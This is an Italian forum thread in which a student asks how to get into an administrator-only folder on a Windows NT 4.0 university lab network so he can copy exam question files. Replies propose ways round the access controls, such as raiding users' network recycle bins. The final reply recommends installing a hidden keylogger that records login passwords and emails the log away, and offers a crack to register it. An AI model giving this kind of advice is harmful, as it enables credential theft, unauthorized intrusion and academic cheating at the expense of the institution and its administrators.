WinNT da "infiltrare"

vbimport

Ciao gente, questo non è un messaggio da hackers, vorrei precisarlo dall’inizio in modo tale da non esser preso per un pirata informatico! Il mio problema è un esame d’università che viene sostenuto al computer con un programma che legge i files impostati dal prof. (praticamente le domande!).

Il luogo del “delitto” è composto da 60pc collegati ad un server di rete dove ci sono i target files il tutto sotto sistema operativo MS WinNt 4.0 con ServicePack3
Quando c’è l’esame, ovviamente i files vengono condivisi per essere letti da tutti ma ovviamente è impossibile poterseli passare su un floppy.

SONO SU QUESTO MALEDETTO ESAME DA UN ANNO E VI POSSO GARANTIRE CHE MI SONO STUFATO DI STUDIARLO!!! (piccolo sfogo, perdonatemi )

Ora, quando l’aula è aperta agli studenti, la cartella è resa accessibile solo dagli amministratori (ovviamente).

Come posso entrarci e prendere i files?

Aiutameti, altrimenti mi sa che non mi laureo più!

Io da parte mia, continua a studiare la materia… voglia un giorno esserci una “botta di culo”…

Ehm… se non hai permessi c’è poco da fare… L’unica sarebbe avvicinarsi ad un amministratore e diventare poweruser… oppure controllare che ci sia la possibilità di creare una “cartella” e metterci dentro tutti i files… ma una domanda? Ci sono Hard Disk nei computers? E tu pui accedervi? Potrebbe essere possibile accedere al “cestino” degli utenti in rete… e da li fare tutte le illegalità del caso… ma se sono configurati bene… l’unica è il cellulare IR.

Vai sul sito www.iopus.com e scarica il programma chiamato Starr. Dopo averlo installato e avviato il programma si nasconde e registra tutte le login e password inserite (non so se con quella dell’NT funzioni)creando un file log nella sua cartella d’installazione che può anche spedire via E-MAIL automaticamente all’indirizzo impostato da te. Ti spedisco già il crack per registralo.
Buona fortuna e buon lavoro…